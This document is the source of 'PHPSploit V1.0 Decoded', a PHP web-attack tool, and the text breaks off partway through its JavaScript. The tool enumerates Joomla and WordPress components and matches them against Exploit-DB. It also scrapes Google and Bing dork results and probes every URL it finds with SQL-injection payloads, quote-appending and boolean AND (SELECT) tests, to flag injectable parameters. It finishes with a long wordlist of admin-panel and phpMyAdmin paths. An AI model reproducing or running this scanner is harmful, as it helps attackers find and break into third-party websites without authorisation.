PHPSploit V1.0 Decoded

[io.kent]

<?php
set_time_limit(0);
error_reporting(0);
@ignore_user_abort(true);
ini_set('memory_limit', '128M');

if(@$_GET['webvuln'])
{
//lagripp code
function ask_exploit_db($component){ //  ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;

$ExPloiTdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";

$result = @file_get_contents($ExPloiTdb);

if (@eregi("No results",$result))  {

echo"<td>Not Found</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>";

}else{

echo"<td><a href='$ExPloiTdb'>Found ..!</a></td><td><--</td></tr>";

}
}

/**************************************************************/

function get_components($site1){  //   ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;

$source = @file_get_contents($site1);

preg_match_all('{option,(.*?)/}i',$source,$f);
preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2);
preg_match_all('{/components/(.*?)/}i',$source,$f3);

$arz=array_merge($f2[1],$f[1],$f3[1]);

$coms=array();

if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}

foreach(array_unique($arz) as $x){

$coms[]=$x;
}

foreach($coms as $comm){

echo "<tr><td>$comm</td>";

ask_exploit_db($comm);

}

}

/**************************************************************/

function get_plugins($site1){  // ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;

$source = @file_get_contents($site1);

preg_match_all("#/plugins/(.*?)/#i", $source, $f);

$plugins=array_unique($f[1]);

if(count($plugins)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}

foreach($plugins as $plugin){

echo "<tr><td>$plugin</td>";

ask_exploit_db($plugin);

}

}

/**************************************************************/

function t_header($site1){ // ***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;

echo'<table align="center" border="1" width="50%" cellspacing="1" cellpadding="5">';

echo'
<tr id="oo">
<td>Site : <a href="'.$site1.'">'.$site1.'</a></td>
<td>Exploit-db</b></td>
<td>Exploit it !</td>
</tr>
';

}
//--------------fin gripp



// Party vulnerability

$site1=strip_tags(trim($_GET['webvuln']));

t_header($site1);

 $url_to_change = $site1;
  $www  = 'www';
  $position = strpos($url_to_change, $www);

  if ($position === false) {
   $site1 = str_replace("".$site1."", "www.".$site1."", $site1);
      } else 
      {
     echo '';
      }

if($_GET['what'] == 'joomla')
{
echo get_components("http://".$site1);
}
elseif($_GET['what'] == 'wordpress')
{
echo get_plugins("http://".$site1);
}
}
elseif($_GET['dork'])
{
//////////////// ICI POUR LES SITE SIMPLE SQLi seulement pour l'instant
?>



<?php
/*  Google dork scanner
*	yepss... you know what this is
*
*/


@error_reporting(0);
@set_time_limit(60);

function fetch($url) {
	if(!function_exists("curl_init")){
		$bu = trim(@file_get_contents($url));
		if($bu == "") return "";
		else return $bu;
	}

	$header[] = "Accept-Language: en";
	$header[] = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3";
	$header[] = "Connection: Keep-Alive";
	$header[] = "Pragma: no-cache";
	$header[] = "Cache-Control: no-cache";

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE );
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
	curl_setopt($ch, CURLOPT_TIMEOUT, 7);
	curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
	$content = curl_exec($ch);
	curl_close($ch);
	return $content;
}

function sqlcheck($url_){
	// clean url
	$url_ = "http://".trim(str_ireplace("http://","",$url_));
	$url_ = str_ireplace("&","&",$url_);
	$urls = explode("?",$url_);
	// check if url contains querystring
	if(count($urls)==2){
		$url = $urls[0];
		$querys = explode("&",$urls[1]);
		foreach($querys as $query){
			$vars = explode("=",$query);
			//echo $query;
			// check if parameter has a numeric value
			if((count($vars)>=2) && (is_numeric($vars[1]))){
				$final = str_replace($query,$query."%27",$url_);
				//echo $final;
				$content = fetch($final);
			    $url_1 = file_get_contents($url_);
				$url_2 = file_get_contents($final);
				if(preg_match("/sql syntax|sql error|right syntax to use near|Warning|SQL|syntax error converting|unclosed quotation|is not a valid MySQL result/i",$content) OR ($url_1 !== $url_2)){
					return $vars[0];

				}
			}
		}
	}
	return ""; // gagal son
}
function sqlheavycheck($url_){
	// clean url
	$url_ = "http://".trim(str_ireplace("http://","",$url_));
	$url_ = str_ireplace("&","&",$url_);

	// check if url contains querystring
	$pos = stripos($url_,"?");
	if($pos !== false){
		$url = substr($url_,0,$pos);
		$que = substr($url_,$pos+1);


		$querys = explode("&",$que);
		foreach($querys as $query){
			$vars = explode("=",$query);
			//echo $query;
			// check if parameter has a numeric value
			if((count($vars)>=2) && (is_numeric($vars[1]))){
				// and 1=(select 1)
				$acak = rand(1111,9999);
				$final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%20".$acak."%29--",$url_);
				$contrue = fetch($final);
				//echo "final1 : ".$final."<br />";

				// and 1=(select 0)
				$acak = rand(1111,9999);
				$final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%200%29--",$url_);
				//echo "final2 : ".$final."<br />";
				$confalse = fetch($final);

				$numtrue = strlen(strip_tags($contrue));
				$numfalse = strlen(strip_tags($confalse));
				$selisih = $numtrue - $numfalse;


				if($selisih >= 30){
					return $vars[0];
				}
				else{
					//' and 1=(select 1) and '1'='1
					$acak = rand(1111,9999);
					$final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%20".$acak."%29%20AND%20%271%27=%271",$url_);
					$contrue = fetch($final);
					//echo "final1 : ".$final."<br />";

					//' and 1=(select 0) and '1'='1
					$acak = rand(1111,9999);
					$final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%200%29%20AND%20%271%27=%271",$url_);
					//echo "final2 : ".$final."<br />";
					$confalse = fetch($final);

					$numtrue = strlen(strip_tags($contrue));
					$numfalse = strlen(strip_tags($confalse));
					$selisih = $numtrue - $numfalse;

					if($selisih >= 30){
						return $vars[0];
					}
				}
			}
		}
	}
	return ""; // gagal son... 
}


// debugging tools
if(isset($_GET['check'])&&($_GET['check']!="")){
$url = $_GET['check'];
echo $url." ".sqlcheck($url);
die();
}
if(isset($_GET['heavycheck'])&&($_GET['heavycheck']!="")){
$url = $_GET['heavycheck'];
echo $url." ".sqlheavycheck($url);
die();
}
// debugging tools end


if(isset($_GET['dork'])&&($_GET['dork']!="")){
	$gnum = 10; // jumlah hasil pencarian perhalaman
	$setype = "google"; // default cari pakek g00gle
	if(isset($_GET['setype'])) $setype = strtolower(trim($_GET['setype']));

	if(isset($_GET['page'])){
		$gpage = (int) $_GET['page'];
		if($gpage < 1) $gpage = 1;
	}
	else $gpage = 1;
	$gpage = ($gpage - 1) * $gnum;

	if($gpage > ($gpage * $gnum)){
		echo "_finish_|max only ".$gpage." results";
		die();
	}

	$dork = stripslashes($_GET['dork']);

	$dorkg = "site:".urldecode($dork)." filetype:php";


	$dorkb = urldecode("site:".$dork."+php");
	$dorkb = str_replace(" ","+",$dorkb);

	if($setype == "google"){
		for($i=1; $i<3; $i++)
		{
		$gsearch = fetch("http://www.google.com/search?hl=fr&q=" . urlencode($dorkg) . "&start=$gpage");

		$raws = explode("<h3 class=\"r\">",$gsearch);
		if((trim($gsearch) == "") || (count($raws) <= 1) || !(preg_match('/<h3 class="r"><a href="(.*?)"/si',$gsearch))){

			echo "<font color=#ff0000>[X] ".$setype."</font>";

			die();
		}
		}
	}
	elseif($setype == "bing"){
		for($i=1; $i<3; $i++)
		{
		$dork = preg_replace("/^[^:]*.*)/i","\\1",$dorkb);
		$gsearch = fetch("http://www.bing.com/search?q=".$dorkb."&filt=all&first=".$gpage."&FORM=PERE3");
		$raws = explode("<div class=\"sb_tlst\"><h3>",$gsearch);			
		if((trim($gsearch) == "") || (!preg_match("/class=\"sb_pagN\"/i",$gsearch)) || (count($raws) <= 1)){
			echo "<font color=#ff0000>[X] ".$setype."</font>";

			die();
		}
		}
	}
	else{
		echo "Search engine not supported";
		die();
	}

	foreach($raws as $korban){
		if(strlen($korban) >= 9 && (substr($korban,0,9)=="<a href=\"")){
			$heavy = false;
			if((isset($_GET['heavy'])) && ($_GET['heavy']=='1')) $heavy = true;

			$calon = substr($korban,9);
			$pos = strpos($calon,"\"");
			if($pos !== false){
				$url = trim(substr($calon,0,$pos));
				if(preg_match("/facebook\.|yahoo\.|google\.|youtube\./i",$url)) continue;
				if(!preg_match("/\w+=\d+/i",$url)) continue;

				if($heavy) {
					$vulnvar = sqlheavycheck($url);
					if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />";
					else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />";
					echo $laporan;

				}
				else{
					$vulnvar = sqlcheck($url);
					if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />";
					else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />";
					echo $laporan;
				}
			}
		}
	}
	die(); // mas kamu koq looyo...
    }
}
else
{


$list['front'] ="admin
team
adm
admincp
admcp
cp
modcp
moderatorcp
adminare
admins
cpanel
controlpanel";
$list['end'] = "admin1.php
team
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
ccms/
upload.php
ccms/login.php
ccms/index.php
maintenance/
webmaster/
adm/
configuration/
configure/
websvn/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpMyAdmin/
phpmyadmin/
PMA/
admin/
dbadmin/
mysql/
myadmin/
phpmyadmin2/
phpMyAdmin2/
phpMyAdmin-2/
php-my-admin/
weMeanYouNoHarm/
V20xRmRRPT0K/
admin/pma/
admin/phpmyadmin/
db/
myadmin/
mysql/
mysqladmin/
typo3/phpmyadmin/
phpadmin/
phpmyadmin1/
web/phpMyAdmin/
xampp/phpmyadmin/
web/
php-my-admin/
websql/
phpMyAdmin-2/
php-my-admin/
phpMyAdmin-2.8.2.1/
phpMyAdmin-2.8.2.2/
phpMyAdmin-2.8.2.3/
phpMyAdmin-2.8.2.4/
phpMyAdmin-2.10.0.0/
phpMyAdmin-2.10.0.1/
phpMyAdmin-2.10.0.2/
phpMyAdmin-2.10.1.0/
phpMyAdmin-2.10.2.0/
phpMyAdmin-2.11.0.0/
phpMyAdmin-2.11.1.0/
phpMyAdmin-2.11.1.1/
phpMyAdmin-2.11.1.2/
phpMyAdmin-2.11.2.0/
phpMyAdmin-2.11.2.1/
phpMyAdmin-2.11.2.2/
phpMyAdmin-2.11.3.0/
phpMyAdmin-2.11.4.0/
phpMyAdmin-2.11.5.0/
phpMyAdmin-2.11.5.1/
phpMyAdmin-2.11.5.2/
phpMyAdmin-2.11.6.0/
phpMyAdmin-2.11.7.0/
phpMyAdmin-2.11.7.1/
phpMyAdmin-2.11.8.0/
phpMyAdmin-2.11.9.0/
phpMyAdmin-2.11.9.1/
phpMyAdmin-2.11.9.2/
phpMyAdmin-2.11.9.3/
phpMyAdmin-2.11.9.4/
phpMyAdmin-3.0.0.0/
phpMyAdmin-3.0.1.0/
phpMyAdmin-3.0.1.1/
phpMyAdmin-3.0.2.0/
phpMyAdmin-3.1.0.0/
phpMyAdmin-3.1.1.0/
phpMyAdmin-3.1.2.0/
phpMyAdmin-3.1.3.0/
phpMyAdmin-2.9.0-rc1/
phpMyAdmin-2.9.0/
phpMyAdmin-2.9.0.1/
phpMyAdmin-2.9.0.2/
phpMyAdmin-2.9.1/
phpMyAdmin-2.9.2/
phpMyAdmin-3.4.3.1-all-languages/
phpMyAdmin-3.4.3.1-english/
phpMyAdmin-3.4.3.1/
sqlmanager/
mysqlmanager/
p/m/a/
PMA2005/
pma2005/
pma2006/
pma2007/
pma2008/
pma2009/
phpmanager/
php-myadmin/
phpmy-admin/
webadmin/
sqlweb/
websql/
webdb/
mysqladmin/
mysql-admin/
databaseadmin/
admm/
admn/
w00tw00t.at.blackhats.romanian.anti-sec:)/
phpMyAdmin/scripts/setup.php/
phpmyadmin/scripts/setup.php/
pma/scripts/setup.php/
myadmin/scripts/setup.php/
MyAdmin/scripts/setup.php/
phpmyadmin/scripts/setup.php/
phpMyAdmin/scripts/setup.php/
phpMyAdmin-2.2.3/
phpMyAdmin-2.2.6/
phpMyAdmin-2.5.1/
phpMyAdmin-2.5.4/
phpMyAdmin-2.5.5-rc1/
phpMyAdmin-2.5.5-rc2/
phpMyAdmin-2.5.5/
phpMyAdmin-2.5.5-pl1/
phpMyAdmin-2.5.6-rc1/
phpMyAdmin-2.5.6-rc2/
phpMyAdmin-2.5.6/
phpMyAdmin-2.5.7/
phpMyAdmin-2.5.7-pl1/
phpMyAdmin-2.6.0-alpha/
phpMyAdmin-2.6.0-alpha2/
phpMyAdmin-2.6.0-beta1/
phpMyAdmin-2.6.0-beta2/
phpMyAdmin-2.6.0-rc1/
phpMyAdmin-2.6.0-rc2/
phpMyAdmin-2.6.0-rc3/
phpMyAdmin-2.6.0/
phpMyAdmin-2.6.0-pl1/
phpMyAdmin-2.6.0-pl2/
phpMyAdmin-2.6.0-pl3/
phpMyAdmin-2.6.1-rc1/
phpMyAdmin-2.6.1-rc2/
phpMyAdmin-2.6.1/
phpMyAdmin-2.6.1-pl1/
phpMyAdmin-2.6.1-pl2/
phpMyAdmin-2.6.1-pl3/
phpMyAdmin-2.6.2-rc1/
phpMyAdmin-2.6.2-beta1/
phpMyAdmin-2.6.2-rc1/
phpMyAdmin-2.6.2/
phpMyAdmin-2.6.2-pl1/
phpMyAdmin-2.6.3/
phpMyAdmin-2.6.3-rc1/
phpMyAdmin-2.6.3/
phpMyAdmin-2.6.3-pl1/
phpMyAdmin-2.6.4-rc1/
phpMyAdmin-2.6.4-pl1/
phpMyAdmin-2.6.4-pl2/
phpMyAdmin-2.6.4-pl3/
phpMyAdmin-2.6.4-pl4/
phpMyAdmin-2.6.4/
phpMyAdmin-2.7.0-beta1/
phpMyAdmin-2.7.0-rc1/
phpMyAdmin-2.7.0-pl1/
phpMyAdmin-2.7.0-pl2/
phpMyAdmin-2.7.0/
phpMyAdmin-2.8.0-beta1/
phpMyAdmin-2.8.0-rc1/
phpMyAdmin-2.8.0-rc2/
phpMyAdmin-2.8.0/
phpMyAdmin-2.8.0.1/
phpMyAdmin-2.8.0.2/
phpMyAdmin-2.8.0.3/
phpMyAdmin-2.8.0.4/
phpMyAdmin-2.8.1-rc1/
phpMyAdmin-2.8.1/
phpMyAdmin-2.8.2/
sqlmanager/
mysqlmanager/
p/m/a/
PMA2005/
pma2005/
phpmanager/
php-myadmin/
phpmy-admin/
webadmin/
sqlweb/
websql/
webdb/
mysqladmin/
mysql-admin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/
adminarea/
bb-admin/
adminLogin/
panel-administracion/
instadmin/
memberadmin/
administratorlogin/
admin/admin.php
admin_area/admin.php
admin_area/login.php
siteadmin/login.php
siteadmin/index.php
siteadmin/login.html
admin/admin.html
admin_area/index.php
bb-admin/index.php
bb-admin/login.php
bb-admin/admin.php
admin_area/login.html
admin_area/index.html
admincp/index.asp
admincp/login.asp
admincp/index.html
webadmin/index.html
webadmin/admin.html
webadmin/login.html
admin/admin_login.html
admin_login.html
panel-administracion/login.html
nsw/admin/login.php
webadmin/login.php
admin/admin_login.php
admin_login.php
admin_area/admin.html
pages/admin/admin-login.php
admin/admin-login.php
admin-login.php
bb-admin/index.html
bb-admin/login.html
bb-admin/admin.html
admin/home.html
pages/admin/admin-login.html
admin/admin-login.html
admin-login.html
admin/adminLogin.html
adminLogin.html
home.html
rcjakar/admin/login.php
adminarea/index.html
adminarea/admin.html
webadmin/index.php
webadmin/admin.php
user.html
modelsearch/login.html
adminarea/login.html
panel-administracion/index.html
panel-administracion/admin.html
modelsearch/index.html
modelsearch/admin.html
admincontrol/login.html
adm/index.html
adm.html
user.php
panel-administracion/login.php
wp-login.php
adminLogin.php
admin/adminLogin.php
home.php
adminarea/index.php
adminarea/admin.php
adminarea/login.php
panel-administracion/index.php
panel-administracion/admin.php
modelsearch/index.php
modelsearch/admin.php
admincontrol/login.php
adm/admloginuser.php
admloginuser.php
admin2/login.php
admin2/index.php
adm/index.php
adm.php
affiliate.php
adm_auth.php
memberadmin.php
administratorlogin.php
admin/admin.asp
admin_area/admin.asp
admin_area/login.asp
admin_area/index.asp
bb-admin/index.asp
bb-admin/login.asp
bb-admin/admin.asp
pages/admin/admin-login.asp
admin/admin-login.asp
admin-login.asp
user.asp
webadmin/index.asp
webadmin/admin.asp
webadmin/login.asp
admin/admin_login.asp
admin_login.asp
panel-administracion/login.asp
adminLogin.asp
admin/adminLogin.asp
home.asp
adminarea/index.asp
adminarea/admin.asp
adminarea/login.asp
panel-administracion/index.asp
panel-administracion/admin.asp
modelsearch/index.asp
modelsearch/admin.asp
admincontrol/login.asp
adm/admloginuser.asp
admloginuser.asp
admin2/login.asp
admin2/index.asp
adm/index.asp
adm.asp
affiliate.asp
adm_auth.asp
memberadmin.asp
administratorlogin.asp
siteadmin/login.asp
siteadmin/index.asp
ADMIN/
paneldecontrol/
login/
cms/
admon/
ADMON/
administrador/
ADMIN/login.php
panelc/
ADMIN/login.html
admin.php
login.htm
login.html
login/
login.php
adm/
admin/
admin/account.html
admin/login.html
admin/login.htm
admin/home.php
admin/controlpanel.html
admin/controlpanel.htm
admin/cp.php
admin/adminLogin.html
admin/adminLogin.htm
admin/admin_login.php
admin/controlpanel.php
admin/admin-login.php
admin-login.php
admin/account.php
admin/admin.php
admin.htm
admin.html
adminitem/
adminitem.php
adminitems/
adminitems.php
administrator/
administrator/login.php
administrator.php
administration/
administration.php
adminLogin/
adminlogin.php
admin_area/admin.php
admin_area/
admin_area/login.php
manager/
manager.php
letmein/
letmein.php
superuser/
superuser.php
access/
access.php
sysadm/
sysadm.php
superman/
supervisor/
panel.php
control/
control.php
member/
member.php
members/
members.php
user/
user.php
cp/
uvpanel/
manage/
manage.php
management/
management.php
signin/
signin.php
log-in/
log-in.php
log_in/
log_in.php
sign_in/
sign_in.php
sign-in/
sign-in.php
users/
users.php
accounts/
accounts.php
wp-login.php
bb-admin/login.php
bb-admin/admin.php
bb-admin/admin.html
administrator/account.php
relogin.htm
relogin.html
check.php
relogin.php
processlogin.php
checklogin.php
checkuser.php
checkadmin.php
isadmin.php
authenticate.php
authentication.php
auth.php
authuser.php
authadmin.php
cp.php
modelsearch/login.php
moderator.php
moderator/
controlpanel/
controlpanel.php
admincontrol.php
adminpanel.php
fileadmin/
fileadmin.php
sysadmin.php
admin1.php
admin1.html
admin1.htm
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
phpmyadmin/
myadmin/
ur-admin.php
ur-admin/
Server.php
Server/
wp-admin/
administr8.php
administr8/
webadmin/
webadmin.php
administratie/
admins/
admins.php
administrivia/
Database_Administration/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
power_user/
system_administration/
ss_vms_admin_sm/
bb-admin/
panel-administracion/
instadmin/
memberadmin/
administratorlogin/
adm.php
admin_login.php
panel-administracion/login.php
pages/admin/admin-login.php
pages/admin/
acceso.php
admincp/login.php
admincp/
adminarea/
admincontrol/
affiliate.php
adm_auth.php
memberadmin.php
administratorlogin.php
modules/admin/
administrators.php
siteadmin/
siteadmin.php
adminsite/
kpanel/
vorod/
vorod.php
vorud/
vorud.php
adminpanel/
PSUser/
secure/
webmaster/
webmaster.php
autologin.php
userlogin.php
admin_area.php
cmsadmin.php
security/
usr/
root/
secret/
admin/login.php
admin/adminLogin.php
moderator.php
moderator.html
moderator/login.php
moderator/admin.php
yonetici.php
0admin/
0manager/
aadmin/
cgi-bin/login.php
login1.php
login_admin/
login_admin.php
login_out/
login_out.php
login_user.php
loginerror/
loginok/
loginsave/
loginsuper/
loginsuper.php
login.php
logout/
logout.php
secrets/
super1/
super1.php
super_index.php
super_login.php
supermanager.php
superman.php
superuser.php
supervise/
supervise/Login.php
super.php";





function template() {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta **********="Content-Type" *********"text/html; charset=utf-8" />
<title>PHPSploit V1.0 Decoded By MegaBedder</title>

<style type="text/css">
h1.technique-two {
        width: 405px; height: 120px;

        margin: 0 auto;
}
body{
    background: #070707;
	background-image: url("http://www.easy-upload.net/fichiers/stalker-21-stalccccccker-jeux-video.20111184848.jpg");;
    margin: 0;
    padding: 0;
    background-attachment:fixed;
    color: #FFF;
    font-family: Calibri;
    font-size: 13px;
}
a{
    color: #FFF;
    text-decoration: none;
    font-weight: bold;
}
.wrapper{
    width: 1000px;
    margin: 0 auto;
}
.tube{
    padding: 10px;
}
.red{
    width: 490px;
    border: 1px solid #555;
    background: #333;
    color: #FFF
}
.red input{
    background: #000;
    border: 1px solid #555;
    color: #FFF;
}
.blue{

    float: left;
    width: 500px;
    border: 1px solid #1d7fc3;
    background: #191919;
    color: #1d7fc3;
}
.yellow{
    position:absolute;
	margin-left: 510px;
    float: right;
    width: 480px;
    border: 1px solid #FFBF00;
    background: #191919;
    color: #FFBF00;
}
.green{
    float: left;
    width: 490px;
    border: 1px solid #5fd419;

    background: #191919;
    color: #5fd419;
}

input,select,textarea{
	border:0;
	border:1px solid #900;
	color:#fff;
	background:#000;
	margin:0;
	padding:2px 4px;
}
input:hover,textarea:hover,select:hover{
	background:#200;
	border:1px solid #f00;
}
option{
	background:#000;
}

.white{
	color:#fff;
}


#status{
	width:100%;
	height:auto;
	padding:4px 0;
	border-bottom:1px solid #300;
}
#result a{
	color:#777;
}
.sign{
	color:#222;
}
#box{
	margin:10px 0 0 0;
}
</style>
<script type="text/javascript">
<!--
function insertcode($text, $place, $replace)
{
    var $this = $text;
    var logbox = document.getElementById($place);
    if($replace == 0)
        document.getElementById($place).innerHTML = logbox.innerHTML+$this;
    else
        document.getElementById($place).innerHTML = $this;
//document.getElementById("helpbox").innerHTML = $this;
}
-->
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>';
?>



<!-- <?php echo date("Y",time()); ?> Revan Aditya -->
<script type="text/javascript">
jalan = false;
nomer = 1;
nomermax = 100;
heavy = false;

function ajax(vars, nom, cbFunction){
	var req = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("MSXML2.XMLHTTP.3.0");
	var querystring = '?' + vars + '&page=' + nom;
	req.open("GET", querystring , true);
	req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
	req.onreadystatechange = function(){
		if (req.readyState == 4 && req.status == 200){
			if (req.responseText){
			  cbFunction(req.responseText,vars);
			}
		}
	}
	req.send(null);
}
function showResult(str, vars){
	var box = document.getElementById("result")
	if(str.match(/Warning|Fatal/gi)) box.innerHTML += '<span class=\"red\">*** </span> error...<br />';
	else box.innerHTML += str;

	if(!jalan){
		box.innerHTML += '<span class=\"red\">*** </span> paused...<br />';
		document.getElementById("loading").style.visibility = 'hidden';
		document.getElementById("btnOk").value = "Resume";
	}
	else {
		if(!str.match(/.*finish.*/gi)){
			sqlCheck(vars);
		}
		else{
			var pesan = str.substring(str.indexOf("|") + 1);
			box.innerHTML = '<span class=\"red\">*** </span> finish ( ' + pesan + ' )<br />';
			document.getElementById('setype').disabled = false;
			document.getElementById('dork').readOnly = false;
			document.getElementById("loading").style.visibility = 'hidden';
			document.getElementById("btnOk").value = "Search";
			nomer = 1;
			jalan = false;
		}
	}

	var oldYPos = 0, newYPos = 0;
	do{
		if (document.all){
			oldYPos = document.body.scrollTop;
		}
		else{
			oldYPos = window.pageYOffset;
		}
		window.scrollBy(0, 50);
		if (document.all){
			newYPos = document.body.scrollTop;
		}
		else{
			newYPos = window.pageYOffset;
		}
	} while (oldYPos < newYPos);
}
function keyHandler(ev){
	if (!ev){
		ev = window.event;
	}
	if (ev.which){
		keycode = ev.which;
	}
	else if (ev.keyCode){
		keycode = ev.keyCode;
	}
	if (keycode == 13){
		sikat();
	}
}
String.prototype.trim = function() {
	return this.replace(/^\s*|\s*$/g, "");
}
function sqlCheck(xdata){
	if(jalan){
		ajax(xdata, nomer, showResult);
		nomer++;
	}
}
function sqlHeavyCheck(xdata){
	if(jalan){
		ajax(xdata + '&heavy=1', nomer, showResult);
		nomer++;
	}
}
function sikat(){
	var btext = document.getElementById("btnOk");
	if((btext.value == 'Search') || (btext.value == 'Resume')){
		if(!jalan){
			if(btext.value == 'Search') nomer = 1;
			var target = document.getElementById('dork');
			var setype = document.getElementById('setype');
			if(target.value.trim().length>0) {
				document.getElementById("loading").style.visibility = 'visible';
				document.getElementById("btnOk").value = "Pause";
				target.readOnly = true;
				setype.disabled = true;
				jalan = true;
